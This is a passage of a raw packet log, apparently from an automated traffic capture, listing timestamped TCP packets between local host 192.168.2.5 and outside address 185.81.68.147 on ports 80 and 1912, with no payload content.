                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.029556990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.029591084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.029638052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.030730009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.030761957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.030785084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.031883955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.031915903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.031944990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.033123016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.033155918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.033180952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.034188986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.034223080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.034248114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.035347939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.035382986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.035410881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.036494970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.036581993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.036659002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.037570000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.037672997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.037725925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.038861036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.038893938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.038919926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.039927006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.039995909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.040088892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.041198015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.041234016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.041280985 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.042232990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.042305946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.042351961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.043354034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.043410063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.043478966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.044552088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.044611931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.044670105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.045701981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.045759916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.045860052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.046864033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.046917915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.047044039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.048067093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.048131943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.048187971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.049310923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.049345016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.049364090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.050352097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.050419092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.050481081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.051496983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.051552057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.051642895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.052666903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.052735090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.052788019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.053888083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.054001093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.054013014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.054966927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.055100918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.055128098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.059345961 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.098754883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.179177046 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187340021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187685013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187942982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187978983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.188007116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.188044071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.189155102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.189188957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.189244032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.190265894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.190546036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.190602064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.191380024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.191458941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192114115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192629099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192663908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192734003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.193653107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.193805933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.193865061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.194988966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.195024014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.195091009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.196099043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.196203947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.196261883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.197165012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.197304010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.197357893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.198314905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.198473930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.198781967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.199580908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.199697971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200263977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200676918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200834990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200895071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.201817989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.201942921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.201996088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.203006983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.203269958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.203339100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.204236031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.204269886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.204848051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.205280066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.205429077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.205482006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.206510067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.206614017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.206682920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.207616091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.207865000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.207933903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.208784103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.209059954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.209119081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.209984064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.210036039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.210098028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.211194992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.211230993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.211301088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.212393999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.212429047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.212524891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.213459969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.213515997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.213641882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.214592934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.214699030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.214764118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.215744972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.215934038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.216058016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.217034101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.217068911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.217174053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.218198061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.218239069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.218301058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.219336033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.219372988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.219435930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.220521927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.220556974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.220622063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.221657991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.221766949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.221822023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.222826004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.222862959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.222929955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.223937035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.224055052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.224113941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.225167036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.225202084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.225260973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.226305962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.226361036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.226414919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.227396965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.227564096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.227646112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.228602886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.228729010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.228800058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.229708910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.229784012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.229854107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.231106043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.231141090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.231349945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.232120037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.232153893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.232227087 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.233174086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.233289957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.233355999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.234348059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.234462023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.234522104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.235515118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.235754967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.236119986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.236751080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.236830950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.236884117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.238306046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.238339901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.238404989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.238977909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.239083052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.239140034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.240268946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.240303040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.240364075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.241442919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.241552114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.241739988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.242563009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.242597103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.242664099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246279001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246315002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246349096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246381998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246407032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246417046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246440887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246454954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.246694088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.247565985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.247729063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.247776985 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.248488903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.301882029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.379502058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.379580021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.379880905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.379893064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.379987001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.380350113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.380842924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.380970955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.381125927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.382152081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.382170916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.382280111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.383169889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.383377075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.383464098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.384310961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.384460926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.384542942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.385526896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.385662079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.385759115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.386693001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.386708975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.386766911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.387875080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.387996912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.388164043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.389094114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.389111042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.389245033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.390219927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.390235901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.390327930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.391369104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.391395092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.391496897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.392486095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.392627001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.392697096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.393678904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.393834114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.393944025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.394798994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.394932032 CET8049708185.81.68.147192.168.2.5
